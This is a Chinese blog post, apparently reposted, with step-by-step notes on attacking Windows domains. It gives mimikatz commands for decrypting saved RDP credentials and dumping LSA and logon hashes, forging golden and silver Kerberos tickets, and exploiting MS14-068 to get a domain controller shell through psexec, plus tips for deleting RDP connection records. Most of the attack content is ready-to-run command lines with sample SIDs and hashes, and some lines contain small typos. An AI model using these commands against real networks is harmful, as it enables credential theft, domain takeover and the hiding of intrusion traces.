当前位置:   article > 正文

内网渗透-跨域环境渗透-1_内网穿透 跨域

内网穿透 跨域

目录

smbclient工具

mimikatz工具

Kerbers协议

NTLM认证

hash传递攻击(PTH攻击)

黄金票据攻击

白银票据

MS14-068


smbclient工具

  1. 在linux里面连接远程windows共享目录,可以使用这个工具
  2. 第一种连接方式:smbclient -L 目标IP -U username -W domain
  3. smbclient -L 目标IP -U username%password -W domain
  4. 第二种连接方式:smbclient //目标IP/tmp/ -U username -W domain
  5. smbclient //目标IP/tmp -U username%password -W domain

mimikatz工具

  1. 1、输入cmdkey /list 查看本地连接rdp的记录
  2. 2、dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*   查看本地的 Credentials,可以得到认证路径以及key
  3. 3、使用mimikatz工具
  4. 使用 mimikatz
  5. 输入 dpapi::cred /in:认证路径\key
  6. 4、我们这时候会得到可用信息,我们记录guidMasterKey值
  7. 5、mimikatz.exe "" privilege::debug"" ""sekurlsa::dpapi full"" exit>>存放路径
  8. 6、这时候,我们就得到了导出来的guidMasterKey值的一些加密信息,记录一下加密情况下的密文以及masterkey的值
  9. 7、进入mimikatz
  10. 执行命令:
  11. dpapi::cred /in:认证路径\key/masterkey:key值  
  12. 8、这时候我们就得到了明文密码!
 

  1. 尽量不要手动删除注册表
  2. del Default.rdp 这个命令就可以删除rdp连接记录!

Kerbers协议

  1. Kerbers协议是一个身份验证机制,常用于windows域内!Kerbers协议可以有效的防止密码被嗅探和重放攻击!
  2. 在所有的通信过程中都是使用加密机制的,可以有效防止中间人攻击
  3. 身份验证过程:
  4. 1、认证服务器(AS): 用户向AS发送身份验证请求。AS生成用于用户和服务之间通信的临时密钥(票据授予票据 - TGT)。
  5. 票据授予服务器(TGS): 用户使用TGT请求特定服务的票据。TGS验证用户,然后生成用于与所需服务通信的票据。
  6. 票据:
  7. 2、票据授予票据(TGT): 用户向AS请求TGT,它包含用户身份信息和加密密钥。
  8. 服务票据: 用户使用TGT向TGS请求服务票据,该票据允许用户与特定服务进行通信。
  9. 3、单点登录(SSO): 用户只需通过一次身份验证即可访问多个服务,而不必为每个服务都提供凭据。
  10. 4、安全通信: 所有通信都使用加密密钥进行加密,防止中间人攻击。
  11. 黄金白银票据:
  12. 黄金票据(通票):伪造TGT
  13. 白银票据(专票):伪造TGS
  14. 整个过程都要通过DC域服务器的验证! 首先认证TGT然后认证TGS!
NTLM认证

NTLM使用挑战-响应机制进行身份验证,通常用于局域网中的Windows系统间的身份验证

hash传递攻击(PTH攻击)


黄金票据攻击

  1. 总结:
  2. 1、想要获取到黄金票据就需要tgt和域控的sid!
  3. whoami /all 可得到域控的sid,也可以用mimikatz
  4. mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt
  5. 2、有了tgt和sid就可以利用mimikatz进行黄金票据的伪造了
  6. mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:S-1-5-21-116212833-2811902251-1975316662/krbtgt:789b3d4352b5a603c97cbfaf4b9a1046/ptt" exit
  7. 3、利用psexec调用目标域控的cmd
  8. psexec.exe \\域名.域 cmd.exe

白银票据

  1. 总结:
  2. 1、想要获取白银票据,需要满足三个条件;域控的IP、域控的sid、域控的hash。
  3. 域控的IP: ping 123.com(域)
  4. 域控的sid:mimikatz或者whoami /all
  5. 域控的hash: mimikatz
  6. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 2.txt
  7. 2、伪造白银票据
  8. mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:s-1-5-21-2511895695-3322341454-56546430
  9. /target:WIN-9JK4CNGD41.xy.com /service:cifs /rc4:02c93f06b80c1feb55df4bcf6551c66e /ptt" exit
  10. 3、清除票据
  11. klist purge

MS14-068

  1. 总结:
  2. 这个漏洞MS14-068不需要域控的管理员hash,只需要域内普通用户权限即可!
  3. 1、获取当前用户的sid whoami /all
  4. 2、使用MS14-068提权工具生成伪造的kerberos协议证书
  5. MS14-068.exe -u <userName>@<domainName> -p <clearPassword>s <userSid>-d <domainControlerAddr>
  6. ===
  7. ms14-068.exe -u xyz@cc.com -p 123.com-s S-1-5-21-2511895695-3322341454-56546430-1104-d WIN-9JJK4CNGD41.cc.com
  8. 3、使用mimikatz将伪造证书写入
  9. mimikatz.exe"kerberos::ptc TGT_xy@cc.com.ccache" exit
  10. 4、使用psexec提权即可
  11. psexec.exe \\WIN-9JJK4CNGD41.cc.com cmd.exe

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Guff_9hys/article/detail/863479
推荐阅读
相关标签
  

闽ICP备14008679号